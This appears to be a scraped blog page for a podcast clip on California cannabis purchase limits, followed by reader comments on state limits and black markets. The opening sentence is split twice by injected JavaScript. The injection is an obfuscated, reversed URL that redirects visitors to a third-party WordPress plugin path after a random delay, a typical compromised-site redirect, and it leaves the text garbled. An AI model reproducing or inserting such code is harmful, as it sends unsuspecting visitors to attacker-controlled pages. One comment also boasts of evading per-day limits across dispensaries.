*Taken from toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomorrow’s new episode of the Real Ones Podcast – In this clip we are discussing the legal cannabis purchasing limits in CA stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tores, and whether or not that regulation should exist. Let us know how you feel below!

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26 thoughts on “WHY have LIMITS on BUYING LEGAL WEED?? | ROP #17”

  1. Hustle Bones says:

    This is the bullshit they're trying to hit our MMJ program with right now in MO, just released the draft(feel free to read). Where limits should be even less strict in overall quantities. They wanna regulate it more than they do opiates in peoples cabinets. Allowing police to come check up on your patient/caregiver grow, or just cut your card/license off at their own will… So much bullshit semantics. Nobody coming in my fucking house without a warrant.


  2. Gawdlyinhale 420 says:

    bruh, i completely get it, but at least yall over in cali get an ounce a day… i only get 2 and a half zips every 2 weeks here in arizona…. shits completely wack, but i do not think there should ever be a limit, shits dumb as fuck, i should be able to go in and buy 3 pounds of weed, and come back 2 hours later and buy another pound…. thats just how it should be, no limits, free the peoples weed of limits! limits equal higher prices too! fight for the right to buy a pound!

  3. Oak City says:

    i agree with you guys not cool that law should be removed

  4. Byron McCuan says:

    I guess I always thought of it like craft breweries. There are some brews that are limited for a variety of reasons, so you can't actually just go and buy a shit ton. You get the amount you get and if you want more you need to come back the next day and hope they have it.

    Beer is all we have though. And we legalized medical in 2016.

  5. MedTHC Ontario says:

    We have gas stations that sell cannabis on our native reserve. It's shitty weed but it's available if ya want it… Lol.

  6. Eli Schroeder says:

    free the weed man

  7. Jeff Smith says:

    We need to reform the laws to make it more flexible

  8. largemarge123 says:

    Here in Oklahoma we just passed medical last june and shops were open by november. Now there are about 1000 licensed shops in the state, with only about 70k patients right now, again statewide. We have a 3oz limit which is pretty nice. It truly is like the wild west out here right now, so many shops are about get put in the dirt. Smoked in the proverbial blunt

  9. Gt 86 says:

    You really smoking an ounce a day lmao broo crackhead status

  10. IIG says:

    Did he say an ounce of weed was 7 or 8 Backwoods? I thought I was hardcore, but I can't hang.

  11. Spooky dub says:

    At least you can fucking buy weed lol damn

  12. Brwneydgrl69 says:

    I live in Portland, Oregon.

    I am recreational. With Recreational.. You can NOT track it… YES, they "SAY" that its a 1oz limit PER day, but I have went to 3-4 dispensaries in 1 day and had 3-4 ozs!! And nothing was ever said to me because it isnt tracked!! So if you too pussy to go to more than 1 dispensary in a day.. that is YOUR problem. LOL!!

  13. EyeSmokeGanja says:

    Idk if its the same as here in oregon but we can buy up to an ounce of weed and or an ounce of extracts which is weird af to me cause yeah theyre the same amount but no were near the same thing lol

  14. Keepin It Wheel says:

    A limit so that people from out of state don't come buy a few pounds then take it across state lines to illegal states

  15. Slim says:

    Lol 20 a day easy bro easy. I think at this point you're just trying to reach that 1st high again. Which will never happen. That's why you smoke so much

  16. D O P E V I L L A says:

    This is why black market will still thrive. I think if there isnt any on the streets also ppl are going to move on to coke which is worse

  17. Joe Bertolone says:

    this is what makes a huge black market.

  18. JfromHouston says:

    They think that by limiting your daily purchase it will stop you from selling on BM. Problem is no one selling on BM is buying legal and re-selling on BM so its not effective at all.

  19. NOOB NOOB _* says:

    That's the coolest ashtray I've ever seen please tell me where you got that or if you made it how

  20. ran in tha cut says:

    The smoke shop I got to in Washington they will let you walk out and walk back in and buy more

  21. RawrStickers says:

    The limits are much more annoying when you live in an illegal state and it's a 90 Mile drive there & back. That's 180 miles to be able to Max out on two O's of flower & 10 grams of concentrates (assuming you hit the two stores). I also think because it's not federally legal has something to do with the limits, like they don't want you buying weight in the store then sending it out. Not that really stops anyone just more of hurdle at least that's my guess.

  22. p@tr0ck says:

    I know you're cognizant of your editing choices guys. SO can you please not blast the damn intro and outro instrumentals please? Yeah it's good, but if i'm trying to turn up the volume to hear your voices and then your music blasts me with bass or loud ass vocals, it leaves a bitter feeling. I'd rather let you know in a comment then downvote the video

  23. -Epileptic Stoner Community- says:

    Just Saying Thanks Bro 🙂

  24. itsstefpapadopoulos says:

    You can get a rec card and you can buy up to 8 oz a day

  25. BigFro420 says:

    There is absolutely a limit on alcohol bro they can’t sell 400$ or more at once without a permit

  26. TheCCC420 says:


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